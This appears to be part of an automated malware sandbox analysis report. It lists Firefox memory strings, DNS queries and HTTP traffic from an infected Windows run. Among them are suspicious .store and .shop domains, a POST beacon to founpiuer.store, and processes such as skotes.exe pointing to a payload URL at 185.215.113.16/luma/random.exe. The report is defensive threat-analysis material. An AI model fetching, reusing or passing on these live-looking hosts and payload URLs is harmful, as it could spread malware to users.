Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: WHERE place_id = (SELECT id FROM moz_places WHERE url_hash = hash(:urlhttps://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=$locale&region=$region&count=30 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2883449828.0000028C9CCDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: RestartOnLastWindowClosed.#maybeRestartBrowser - Still waiting for all windows to be closed and restartTimer to expire. (not restarting)https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: RestartOnLastWindowClosed.#maybeRestartBrowser - Still waiting for all windows to be closed and restartTimer to expire. (not restarting)https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2884703213.0000028C9CD06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C97353000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C97353000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001A.00000002.2884703213.0000028C9CD0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ^([a-z+.-]+:\/{0,3})([^\/@]+@).+@mozilla.org/network/protocol;1?name=fileFailed to listen. Callback argument missing.@mozilla.org/dom/slow-script-debug;1No callback set for this channel.devtools/client/framework/devtools-browserJSON Viewer's onSave failed in startPersistence^([a-z][a-z0-9.+\t-])(:\|;)?(\/\/)?DevToolsStartup.jsm:handleDebuggerFlagUnable to start devtools server on Failed to listen. Listener already attached.Failed to execute WebChannel callback:browser.fixup.dns_first_for_single_words^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]\|$)browser.fixup.domainsuffixwhitelist.get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPget FIXUP_FLAGS_MAKE_ALTERNATE_URIreleaseDistinctSystemPrincipalLoaderget FIXUP_FLAG_FORCE_ALTERNATE_URIDevTools telemetry entry point failed: devtools.debugger.remote-websocketdevtools.performance.recording.ui-base-urldevtools.performance.popup.feature-flagresource://devtools/server/devtools-server.jsdevtools/client/framework/devtools{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}WebChannel/this._originCheckCallback@mozilla.org/network/protocol;1?name=default@mozilla.org/uriloader/handler-service;1resource://devtools/shared/security/socket.jsGot invalid request to save JSON databrowser.urlbar.dnsResolveFullyQualifiedNamesresource://gre/modules/URIFixup.sys.mjs@mozilla.org/uriloader/web-handler-app;1https://e.mail.ru/cgi-bin/sentmsg?mailto=%shttp://poczta.interia.pl/mh/?mailto=%s@mozilla.org/uriloader/local-handler-app;1resource://gre/modules/DeferredTask.sys.mjs@mozilla.org/network/async-stream-copier;1Scheme should be either http or httpsresource://gre/modules/FileUtils.sys.mjsextractScheme/fixupChangedProtocol<isDownloadsImprovementsAlreadyMigratedhttp://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://www.inbox.lv/rfc2368/?value=%s{c6cf88b7-452e-47eb-bdc9-86e3561648ef}resource://gre/modules/JSONFile.sys.mjs@mozilla.org/uriloader/dbus-handler-app;1@mozilla.org/network/file-input-stream;1https://mail.inbox.lv/compose?to=%sCan't invoke URIFixup in the content process_injectDefaultProtocolHandlersIfNeededhttps://mail.yahoo.co.jp/compose/?To=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/FileUtils.sys.mjs{33d75835-722f-42c0-89cc-44f328e56a86}gecko.handlerService.defaultHandlersVersion_finalizeInternal/this._finalizePromise<resource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/JSONFile.sys.mjshandlerSvc fillHandlerInfo: don't know this typehttps://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/ExtHandlerService.sys.mjsresource://gre/modules/NetUtil.sys.mjsFirst argument should be an nsIInputStreamnewChannel requires a single object argument@mozilla.org/scriptableinputstream;1https://mail.yahoo.co.jp/compose/?To=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.inbox.lv/compose?to=%sVALIDATE_DONT_COLLAPSE_WHITESPACENon-zero amount of bytes must be specifiedpdfjs.previousHandler.preferredActionSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLhttps://mail.yandex.ru/compose?mailto=%spdfjs.previousHandler.alway
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C99272000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: doff-text" data-l10n-args="{"engine": "Google"}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"YouTube"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C99272000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: doff-text" data-l10n-args="{"engine": "Google"}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"YouTube"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://www.inbox.lv/rfc2368/?value=%s equals www.yahoo.com (Yahoo)
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2883449828.0000028C9CCDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: x://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: presticitpo.store
Source: global traffic	DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic	DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic	DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic	DNS traffic detected: DNS query: necklacedmny.store
Source: global traffic	DNS traffic detected: DNS query: founpiuer.store
Source: global traffic	DNS traffic detected: DNS query: worddosofrm.shop
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic	DNS traffic detected: DNS query: youtube.com
Source: global traffic	DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: example.org
Source: global traffic	DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic	DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic	DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: mdec.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: js.monitor.azure.com
Source: global traffic	DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: www.facebook.com
Source: global traffic	DNS traffic detected: DNS query: www.youtube.com
Source: global traffic	DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic	DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic	DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic	DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic	DNS traffic detected: DNS query: www.reddit.com
Source: global traffic	DNS traffic detected: DNS query: twitter.com
Source: global traffic	DNS traffic detected: DNS query: reddit.map.fastly.net

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: founpiuer.store

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 05 Nov 2024 17:46:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1WxKfud6HUUUauFKWjUc5K%2BUmHEOdDEgX1qi642jLQjzOaAVxFMWYccHG9qSwvk07P6Q1AUjKnmyfzwve60KjbgBDHkDEDL%2F3UuWlyp1Tl31FTfXdsGCALUdlkwmPfpe1sA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ddea9b95d845211-DEN
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 05 Nov 2024 17:46:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gBjJi9pzJuwoJTM3ZFwgU%2BcUHoTTfdsl34tzVQzZnqnRrI6MbhbvNAxSISDasbfCtoXwTmKWJY%2Fsr7IKYFCofucgZxU2nEJR1bzWB4bOZJKaj6zDc7Yv2gQWwRiQanMqv1I%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ddeaa1ced865201-DEN
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 05 Nov 2024 17:47:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gxpFy1bSLh1iuKTxYmc8K7paOj%2BuykpDd%2FXYH8mNkayFluMVLoTfPo3MLrbMo%2BDUbD3hZsM38vd0brpwdzqPa4OfeqC5JixDSBY65kkVsMXLlshtIGq%2FqB7IIyrJtVfCMSU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ddeaad5ea5ee98f-DFW

Source: firefox.exe, 0000001A.00000002.2842783233.0000028C8B06D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:
Source: 0d287ea527.exe, 0d287ea527.exe, 00000009.00000003.2825831566.000000000075C000.00000004.00000020.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.3014279313.0000000023871000.00000004.00000020.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000002.2978043891.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: 0d287ea527.exe, 00000009.00000003.2825831566.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/1ld-
Source: 0d287ea527.exe, 00000009.00000003.2825831566.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/8l_-
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/D
Source: 0d287ea527.exe, 00000009.00000003.2825831566.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Km
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/amData
Source: c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/ata
Source: 0d287ea527.exe, 00000009.00000003.2825831566.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/gm
Source: 0d287ea527.exe, 00000009.00000003.2825831566.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/k
Source: skotes.exe, 00000006.00000002.2981894572.000000000124A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 00000006.00000002.2981894572.000000000124A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exex
